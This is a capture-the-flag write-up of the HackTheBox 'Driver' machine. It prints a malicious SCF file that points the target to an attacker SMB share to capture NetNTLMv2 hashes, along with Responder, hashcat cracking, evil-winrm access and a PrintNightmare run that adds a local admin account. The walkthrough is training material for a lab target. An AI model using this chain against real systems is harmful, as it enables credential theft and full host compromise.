HackTheBox >> Driver

stimpz0r
Table of Contents

ENUM >> NMAP

# Nmap 7.92 scan initiated Sun Feb 13 16:10:32 2022 as: nmap -sS -A -p 80,135,445 -oN nmap_agressive 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.062s latency).

PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008 (89%), FreeBSD 6.X (85%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:freebsd:freebsd:6.2
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (89%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h02m27s, deviation: 0s, median: 7h02m27s
| smb2-time: 
|   date: 2022-02-13T12:13:14
|_  start_date: 2022-02-12T13:06:06
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   89.93 ms 10.10.14.1
2   83.21 ms 10.10.11.106

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 13 16:11:24 2022 -- 1 IP address (1 host up) scanned in 52.34 seconds

ENUM >> "MFP Firmware Update Center"

  • According to a quick google, the default credentials for this software is: admin:admin, using these credentials we get into the

  • The only working link is Firmware Updates, this contains a page to upload firmware:

ENUM >> Using SCF File attacks to gain a hash

Malicious SCF files was a new concept to me… this one simply forces the target to connect back to our attack box to grab the icon file… with responder loaded we can then capture some sweet NetNTLMv2 hash. To read more check out this link:
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

  • First we construct the malicious .scf file I called driver.scf:
[Shell]
Command=2
IconFile=\\10.10.14.24\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
  • Then we start up responder with the following command:
❯ sudo responder --lm -v -I tun0
  • After uploading our driver.scf:
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : <REDACTED>

ENUM >> Cracking tony’s NetNTLMv2 hash

❯ hashcat -m 5600 tony.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

<REDACTED>:<REDACTED>

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: TONY::DRIVER:df16cbcfe477abcf:8e1f978fea1ed9161b9b7...000000
Time.Started.....: Sun Feb 13 16:55:29 2022 (0 secs)
Time.Estimated...: Sun Feb 13 16:55:29 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1008.6 kH/s (2.93ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 32768/14344385 (0.23%)
Rejected.........: 0/32768 (0.00%)
Restore.Point....: 28672/14344385 (0.20%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: softball27 -> eatme1

Started: Sun Feb 13 16:55:26 2022
Stopped: Sun Feb 13 16:55:31 2022

PRIVESC >> WinRM

❯ evil-winrm -i 10.10.11.106 -u tony -p <REDACTED>

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents>
LOOT >> user.txt
*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
<REDACTED>

PRIVESC >> PrintNightmare FTW!

  • There was a file named CVE-2021-1675.ps1 which contained PrintNightmare… unfortunately Execution Policy wouldn’t allow me to run it, so I brought my own (from Empire):
❯ evil-winrm -i 10.10.11.106 -u tony -p <REDACTED> -s /opt/Empire/empire/server/data/module_source/privesc/

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Printnightmare.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
  • Now to login with our new adm1n account:
❯ evil-winrm -i 10.10.11.106 -u adm1n -p P@ssw0rd

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\adm1n\Documents> cd ..\..\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
<REDACTED>


Leave a Reply

Your email address will not be published. Required fields are marked *